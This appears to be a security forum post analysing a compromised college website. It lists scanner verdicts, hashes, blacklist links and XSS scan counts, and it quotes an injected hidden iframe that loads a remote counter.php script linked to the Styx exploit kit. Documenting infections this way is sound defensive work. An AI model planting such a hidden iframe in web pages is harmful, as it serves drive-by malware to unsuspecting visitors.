An update on a scan of mine on Sept. 1st this year: https://forum.avast.com/index.php?topic=154194.0
Website Unsafe Details - https://www.virustotal.com/nl/url/eb8a6539f6c4a433c193d6bd6361b820577bab212888fec7f6c6703fcf48ad1e/analysis/
Drive-by download attack was detected. Comodo analysts verdict.
Blacklisted site. [ UrlBlacklist details ]
Suspicious iframes detected:
Object: htxp://fmcarbscollege.in/fmcarbscollege.in/%28S%28ir3x1s55dsamsgrkzn5w14vf%29%29/Default1.aspx?access=denied&ReturnUrl=/fmcarbscollege.in/Shaql3d2f1gd1rbztnbv2pr55/Default1.aspx
SHA1: 1a7d5487dd1bf002bea23a975c79e6d21874aa07
Name: TrojWare.JS.Iframe.GJ
/default1.aspx
Severity: Suspicious
Reason: Detected hidden reference to external web resource.
Details: Detected hidden iframe tag to ‘extremeplanet dot pl’ (Oudated software detected on redirect site vulnerable cPanel 11.40.0.19)
Offset: 6018
Threat dump:
[<iframe src="htxp://extremeplanet.pl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>]
- Read: http://securelist.com/blog/incidents/57478/visit-from-an-old-friend-counter-php/
also known as Styx exploit - Needed to change the FTP and CPanel password from a clean computer!
Threat dump MD5: C921E0B32E0875A225FAAA33344E7CE0
File size[byte]: 6162
File type: ASCII
Page/File MD5: D4E5620E958344EFB3ED51956310288C
Blacklisted: http://safeweb.norton.com/report/show?url=fmcarbscollege.in & http://www.yandex.com/infected?url=fmcarbscollege.in&l10n=en
Not adding to security here: http://sameid.net/ip/182.50.130.121/
100/100% malicious: http://zulu.zscaler.com/submission/show/497df73973baed7d558eda04451e19d4-1418429114
Two fails two warnings: https://asafaweb.com/Scan?Url=fmcarbscollege.in
Scan duration[sec]: 0.009000
http://rezervacije.sipt.si/elmah.axd/detail?id=83021614-1ae6-463b-a00d-0c1fbf092adf
on: A potentially dangerous Request.QueryString value was detected from the client (foo=“”).
See: http://zerocert.org/?code=f1177c83e0cb8c8b9e5e7e7e4ddaa0c25e6980a71a2fec22e1ad88fe2b8ec58b
XSS vuln. Results from scanning URL: htxp://extremeplanet.pl/scripts/bb_fbslider.js
Number of sources found: 42
Number of sinks found: 12
&
Results from scanning URL: htxp://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js
Number of sources found: 261
Number of sinks found: 18
&
with bug report: http://bugs.jqueryui.com/query?status=closed&page=25&col=id&col=reporter&order=reporter&row=description
→ anonymous function as the callback to jQuery .hide
polonus